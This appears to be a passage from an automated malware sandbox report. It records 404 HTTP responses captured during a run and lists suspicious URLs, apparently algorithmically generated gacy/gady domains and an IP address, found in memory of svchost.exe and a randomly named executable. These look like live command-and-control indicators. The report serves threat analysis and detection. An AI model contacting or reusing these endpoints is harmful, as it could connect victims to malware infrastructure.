X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:25:48 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:25:54 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:25:54 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:25:49 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 
7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:25:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:26:00 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:26:01 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:26:04 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:26:05 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: svchost.exe String found in binary or memory: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
Source: svchost.exe String found in binary or memory: http://gacyfeb.com/login.php
Source: svchost.exe String found in binary or memory: http://gacyfih.com/login.php
Source: svchost.exe String found in binary or memory: http://gacyhez.com/login.php
Source: svchost.exe String found in binary or memory: http://gacyhis.com/login.php
Source: svchost.exe String found in binary or memory: http://gacynuz.com/login.php
Source: svchost.exe String found in binary or memory: http://gacynuz.com/login.phpcom/login.php
Source: svchost.exe String found in binary or memory: http://gacynyh.com/login.php
Source: svchost.exe String found in binary or memory: http://gacypiw.com/login.php
Source: svchost.exe String found in binary or memory: http://gacyroh.com/
Source: svchost.exe String found in binary or memory: http://gacyryb.com/login.php
Source: svchost.exe, nPtwtzGyOdAtB.exe String found in binary or memory: http://gacyryw.com/login.php
Source: svchost.exe, nPtwtzGyOdAtB.exe String found in binary or memory: http://gacyzuz.com/login.php
Source: svchost.exe String found in binary or memory: http://gadyciz.com/login.php
Source: svchost.exe String found in binary or memory: http://gadyciz.com/login.phpC:
Source: svchost.exe String found in binary or memory: http://gadydas.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyfuh.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1470630285.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gadyfuh.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gadyniw.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674611166.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950331749.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950940753.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675004112.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951109934.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951994053.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadynub.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypah.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684006366.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1678100644.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyqaw.com/login.php
Source: svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2611842069.000000000323D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523218130.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyveb.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvez.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyzib.com/login.php
